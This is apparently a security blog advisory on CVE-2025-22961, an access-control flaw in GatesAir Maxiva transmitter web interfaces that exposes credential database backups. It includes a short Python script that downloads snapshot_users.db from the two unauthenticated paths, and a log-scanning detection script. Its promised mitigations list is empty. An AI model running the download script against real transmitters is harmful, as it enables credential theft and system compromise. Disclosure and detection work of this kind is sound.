A critical information disclosure vulnerability (CVE-2025-22961) has been discovered in the web-based management interface of GatesAir Maxiva UAXT and VAXT transmitters. This vulnerability, caused by Incorrect Access Control (CWE-284), enables unauthenticated attackers to directly access sensitive database backup files (snapshot_users.db) via publicly exposed URLs (/logs/devcfg/snapshot/ and /logs/devcfg/user/). Exploiting this vulnerability can result in the retrieval of sensitive user data, including login credentials, which can potentially lead to a full system compromise. This blog post will delve into the details of the vulnerability, provide code snippets, and examine the potential risks posed by its exploitation.
Vulnerability Details
Product: GatesAir Maxiva UAXT, VAXT Transmitters
Affected Versions: All known versions
CVE ID: CVE-2025-22961
Risk Level: Critical
CWE Classification: CWE-284 (Incorrect Access Control)
The vulnerability can be exploited simply by accessing the following URLs without any authentication:
- https://<IP_ADDRESS>/logs/devcfg/snapshot/
- https://<IP_ADDRESS>/logs/devcfg/user/
These URLs are publicly exposed, allowing anyone to download the sensitive database backup files (snapshot_users.db), which contain user credentials and other sensitive information.
Here's an example code snippet that demonstrates fetching the database file using Python:
import requests

TARGET_IP = '192.168.1.10'  # Replace this with the target IP address

# The two unauthenticated paths described above
url1 = f"https://{TARGET_IP}/logs/devcfg/snapshot/"
url2 = f"https://{TARGET_IP}/logs/devcfg/user/"

# verify=False skips TLS certificate validation
response1 = requests.get(url1, verify=False)
response2 = requests.get(url2, verify=False)

# Save each response body only if the server answered 200 OK
if response1.status_code == 200:
    with open('snapshot_users1.db', 'wb') as file:
        file.write(response1.content)
if response2.status_code == 200:
    with open('snapshot_users2.db', 'wb') as file:
        file.write(response2.content)
Please note that the above code snippet is for demonstration purposes only and should not be used for malicious activities.
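On the detection side, requests to the two paths stand out in HTTP access logs. The following is an added example, not code from the original post or from the vendor: it assumes the transmitter's web traffic is logged by a reverse proxy or web server in Apache/nginx "combined" format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths named in the advisory that expose the user database backups.
SENSITIVE_PREFIXES = ("/logs/devcfg/snapshot/", "/logs/devcfg/user/")

# Assumption: access logs use the Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_backup_access(lines):
    """Return {client_ip: [hit, ...]} for requests to the exposed paths."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Normalise before matching: drop the query string, decode
        # percent-escapes, collapse repeated slashes.
        path = re.sub(r"/{2,}", "/", unquote(m["path"].split("?", 1)[0]))
        if not path.startswith(SENSITIVE_PREFIXES):
            continue
        status = int(m["status"])
        hits.setdefault(m["ip"], []).append({
            "time": m["ts"],
            "path": path,
            "status": status,
            # A 2xx response with a non-empty body means data left the device.
            "served": 200 <= status < 300 and m["size"] not in ("-", "0"),
        })
    return hits

def served_clients(lines):
    """Sorted client IPs that actually received content from those paths."""
    found = find_backup_access(lines)
    return sorted(ip for ip, hs in found.items() if any(h["served"] for h in hs))

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Feb/2025:03:12:44 +0000] "GET /logs/devcfg/snapshot/ HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '198.51.100.7 - - [14/Feb/2025:03:12:45 +0000] "GET /logs/devcfg/snapshot/snapshot_users.db HTTP/1.1" 200 20480 "-" "curl/8.5.0"',
    '203.0.113.9 - - [14/Feb/2025:03:20:01 +0000] "GET /logs//devcfg/user/snapshot_users.db?x=1 HTTP/1.1" 403 153 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [14/Feb/2025:03:21:10 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip in served_clients(SAMPLE_LOG):
        print(f"{ip} downloaded content from an exposed backup path")
```

Any client listed by `served_clients` should be treated as having obtained the credential database, so the accounts stored on that transmitter need their passwords rotated.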
Original References
This vulnerability was discovered by security researchers and was reported to the appropriate authorities and the vendor. The details of the vulnerability can be found at the following sources:
- CVE-2025-22961 - National Vulnerability Database (NVD)
- CWE-284: Improper Access Control - Common Weakness Enumeration (CWE)
Mitigations
At the time of writing this blog post, there have been no patches or updates released by the vendor to address this vulnerability. However, as a temporary measure, users can implement the following mitigations to minimize the risk of exploitation:
Conclusion
The CVE-2025-22961 vulnerability in GatesAir Maxiva UAXT and VAXT transmitters' web-based management interface exposes sensitive information due to incorrect access control. Unauthenticated attackers can exploit this vulnerability to gain unauthorized access to sensitive database backup files, potentially leading to a full system compromise. Users should apply the recommended mitigations to minimize the risks associated with this vulnerability until a patch or update is released by the vendor.
Timeline
Published on: 02/13/2025 23:15:11 UTC
Last modified on: 03/12/2025 19:15:38 UTC